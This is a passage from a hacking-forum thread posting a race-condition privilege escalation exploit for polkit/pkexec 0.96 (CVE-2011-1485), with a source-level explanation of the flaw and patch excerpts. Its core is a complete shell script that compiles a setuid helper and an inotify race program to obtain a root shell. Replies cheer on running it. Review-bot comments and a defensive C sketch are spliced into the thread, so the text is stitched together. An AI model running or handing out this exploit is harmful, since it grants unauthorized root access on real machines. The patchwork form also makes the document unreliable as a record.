Linux pkexec and polkitd 0.96 race condition privilege escalation

Linux pkexec and polkitd 0.96 race condition privilege escalation
10-09-2011, 04:12 AM (This post was last modified: 10-10-2011 02:18 AM by ev1lut10n.)
Post: #1
ev1lut10n Offline
./Devilz Officer
Posts: 239
Joined: Aug 2011
Reputation: 82
Linux pkexec and polkitd 0.96 race condition privilege escalation
exploit download:
http://packetstormsecurity.org/files/vie...xec.sh.txt

Brief Descriptions

Thanks to: all devilzc0de crews and members, X-hack, Danzel


src/polkit/polkitunixprocess.c: where it fails to clarify the real uid; under this race condition it will return the effective one.
on: polkit_unix_process_get_owner (PolkitUnixProcess *process,
  g_snprintf (procbuf, sizeof procbuf, "/proc/%d", process->pid);
  if (stat (procbuf, &statbuf) != 0)
    {
      g_set_error (error,
                   POLKIT_ERROR,
                   POLKIT_ERROR_FAILED,
                   "stat() failed for /proc/%d: %s",
                   process->pid,
                   g_strerror (errno));
      goto out;
    }
where the code only relies on a stat of the pseudo filesystem

src/polkit/polkitsubject.c ---------> there's not enough validation to run polkit_unix_process_new

on polkit_subject_from_string (const gchar *str,
there's not enough validation before launching polkit_unix_process_new
if (g_str_has_prefix (str, "unix-process:"))
    {
      val = g_ascii_strtoull (str + sizeof "unix-process:" - 1,
                              &endptr,
                              10);
      if (*endptr == '\0')
        {
          subject = polkit_unix_process_new ((gint) val);

the fix is to add more validations (polkit_unix_process_new_for_owner, polkit_unix_process_new_full, polkit_unix_process_new_full):

if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT ":%d", &scanned_pid, &scanned_starttime, &scanned_uid) == 3)
{
+ subject = polkit_unix_process_new_for_owner (scanned_pid, scanned_starttime, scanned_uid);
+ }
+ else if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT, &scanned_pid, &scanned_starttime) == 2)
+ {
+ subject = polkit_unix_process_new_full (scanned_pid, scanned_starttime);
+ }
+ else if (sscanf (str, "unix-process:%d", &scanned_pid) == 1)
+ {
+ subject = polkit_unix_process
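Review bot: the hunk is cut off at `subject = polkit_unix_process`, so the branch handling the bare `unix-process:<pid>` form cannot be reviewed as quoted, and no `-` lines for the old `g_ascii_strtoull` parsing are shown, so whether that path is removed rather than left reachable is not visible here; the opening `if (sscanf (...) == 3)` line also lacks the `+` prefix the rest of the chain carries. Worth confirming against the full patch that the pid-only form is accepted only as a fallback and that a caller with a starttime available cannot choose the weaker form.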


src/polkitbackend/polkitbackendsessionmonitor.c
function polkit_backend_session_monitor_get_user_for_subject (PolkitBackendSessionMonitor

if (POLKIT_IS_UNIX_PROCESS (subject))
    {
      GError *local_error;

      local_error = NULL;
      uid = polkit_unix_process_get_owner (POLKIT_UNIX_PROCESS (subject), &local_error);


as we may see from the above code, "polkit_unix_process_get_owner" will not avoid the "Time of Check to Time of Use" problem:
http://www.usenix.org/events/fast05/tech/full_papers/wei/wei.pdf


src/programs/pkexec.c
pkexec doesn't use the uid the parent process had and will still continue when the parent dies:

  pid_of_caller = getppid ();
  if (pid_of_caller == 1)
    {
      pid_of_caller = getpgrp ();
    }

  subject = polkit_unix_process_new (pid_of_caller);


where it will continue even if the parent is dead.

where the patch has been applied by adding prctl to check the death signal of the parent process (PR_SET_PDEATHSIG):

if (prctl (PR_SET_PDEATHSIG, SIGTERM) != 0)
+ {
+ g_printerr ("prctl(PR_SET_PDEATHSIG, SIGTERM) failed: %s\n", g_strerror (errno)); /**So if our parent die goto out***/
+ goto out;
+ }
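Review bot: `PR_SET_PDEATHSIG` only arms a signal for a parent that exits after the `prctl` call, so on its own this does not cover a caller that has already gone away before this point; the `getppid () == 1` fallback shown above still decides that case, and the two need to be ordered so that the pid used for the subject is read only after the death signal is armed, otherwise a parent dying between the two leaves a stale pid with no signal. As quoted, the `if (prctl (...) != 0)` line lacks the `+` prefix that its body has, so the hunk context is inconsistent.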


pkexec.sh

Code:
#!/bin/sh

<<COMMENT1

Exploit Title: Linux pkexec and polkitd 0.96 race condition privilege escalation
Date: Sun Oct  9 00:31:10 WIT 2011
Author: Ev1lut10n
About Ev1lut10n:
http://jasaplus.com/ev1lut10n
A Chinese Man Lives in Indonesia
Software Link: http://pkgs.fedoraproject.org/repo/pkgs/polkit/polkit-0.96.tar.gz/e0a06da501b04ed3bab986a9df5b5aa2/
Version: 0.96
Tested on: 2.6.35-22-generic #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC 2010 i686 GNU/Linux under Gnome Environment
CVE : CVE-2011-1485


COMMENT1



cat > suid.c << _EOF
#include <stdio.h>
#include <stdlib.h>   /* malloc */
#include <string.h>
#include <unistd.h>   /* setuid, setgid */
/* perintah = command, spasi = space */
int main(int argc,char *argv[])
{
char *root=malloc(1000);
char perintah[256]="/bin/sh -c ";
int i;
char *spasi=" ";
       root[0]='\0';            /* malloc() memory is not zeroed; strcat needs an empty string */
       strcat(root,perintah);
      for (i=1;i<argc;i++)    /* append every argument; no length check against the 1000-byte buffer */
      {
        strcat(root,argv[i]);
        strcat(root,spasi);
      }
setuid(0);
setgid(0);
system(root);
return 0;
}
_EOF



cat > makesuid.c << _EOF
/**this code was modified from http://www.exploit-db.com/exploits/17932/  by zx2c **/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
int main(int argc, char **argv)
{
    if (argc < 4)
    {
        fprintf(stderr, "usage: %s <command> <arg1> <arg2>\n", argv[0]);
        return 1;
    }
    if (fork() != 0)
    {
        /* parent: wait until something accesses /proc/<pid>, then replace this image */
        int fd;
        char pid_path[15];
        sprintf(pid_path, "/proc/%i", getpid());
        close(0); close(1); close(2);
        fd = inotify_init();
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, NULL, 0);      /* blocks until an event is queued; the zero-length read then returns */
        execl("/usr/bin/X", "X", NULL);
    }
    else
    {
        /* child: run pkexec with the three arguments given on the command line */
        execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL);
    }

    return 0;
}

_EOF


gcc -o /tmp/suid suid.c
gcc -o makesuid makesuid.c
./makesuid chown root:root /tmp/suid
./makesuid chmod u+s /tmp/suid
echo "your suid is on /tmp/suid make sure u move this !!!"
/tmp/./suid -c /bin/sh


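Added example, not polkit's own code and not part of the exploit above: a C sketch, from the daemon's side, of the checks the patch introduces. It parses the three `unix-process:` subject forms with the same sscanf chain as the patch, pulls starttime (field 22) out of a /proc/<pid>/stat line, and refuses a subject whose pid no longer belongs to the process it was created for. The function names and the stat line are assumed/constructed and are not polkit identifiers.

```c
#include <stdio.h>
#include <string.h>

/* The three subject forms the patched polkit_subject_from_string accepts. */
struct subject { int pid; unsigned long long starttime; int uid; int fields; };

/* Mirrors the patched sscanf chain: fields is 3, 2, 1, or 0 for a non unix-process string. */
static struct subject parse_subject(const char *str)
{
    struct subject s = { 0, 0, -1, 0 };
    if (sscanf(str, "unix-process:%d:%llu:%d", &s.pid, &s.starttime, &s.uid) == 3)
        s.fields = 3;
    else if (sscanf(str, "unix-process:%d:%llu", &s.pid, &s.starttime) == 2)
        s.fields = 2;
    else if (sscanf(str, "unix-process:%d", &s.pid) == 1)
        s.fields = 1;
    return s;
}

/* Field 22 of /proc/<pid>/stat is starttime (clock ticks since boot, fixed at fork,
 * unchanged by execve). comm may hold spaces or ')', so skip past the last ')' first. */
static int starttime_from_stat_line(const char *line, unsigned long long *out)
{
    const char *p = strrchr(line, ')');
    if (p == NULL) return -1;
    p++;
    for (int field = 3; field < 22; field++) {   /* skip fields state .. itrealvalue */
        while (*p == ' ') p++;
        if (*p == '\0') return -1;                /* line too short: malformed */
        while (*p != '\0' && *p != ' ') p++;
    }
    return sscanf(p, "%llu", out) == 1 ? 0 : -1;
}

/* Constructed /proc/4242/stat line for the demo, not captured from a real host. */
static const char *SAMPLE_STAT = "4242 (pkexec) S 4100 4242 4100 34816 4242 4194560 200 0 0 0 1 0 0 0 20 0 1 0 123456 8000000 300";

/* Bind a subject to the live process before acting on it: same pid and the starttime
 * recorded when the subject was made, so a reused pid is refused. starttime survives
 * execve, so this alone does not catch a caller that exec'd a setuid binary in place;
 * that gap is why the fix also carries the caller's uid in the subject string. */
static int subject_matches_stat(const struct subject *s, const char *stat_line)
{
    int pid; unsigned long long st;
    if (s->fields < 2 || sscanf(stat_line, "%d (", &pid) != 1 || pid != s->pid)
        return 0;                                 /* bare pid, bad line or other process */
    return starttime_from_stat_line(stat_line, &st) == 0 && st == s->starttime;
}
```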
10-09-2011, 01:14 PM
Post: #2
mariachi Away
has been reboot
**
Moderators
Posts: 2,359
Joined: Nov 2010
Reputation: 55
RE: Linux pkexec and polkitd 0.96 race condition privilege escalation
wow..... matabelo:

privilege escalation, let me try it, maybe I'll get lucky and get root..... hooray
10-09-2011, 05:20 PM
Post: #3
X-h4ck Offline
./Devilz 1st Cadet
Posts: 43
Joined: Jul 2011
Reputation: 11
RE: Linux pkexec and polkitd 0.96 race condition privilege escalation
Thanks and Good Job bro :)
10-12-2011, 09:40 AM
Post: #4
nubi3 Offline
./Devilz Officer
Posts: 248
Joined: Jan 2011
Reputation: 0
RE: Linux pkexec and polkitd 0.96 race condition privilege escalation
thanks bro, executing it right away, here we go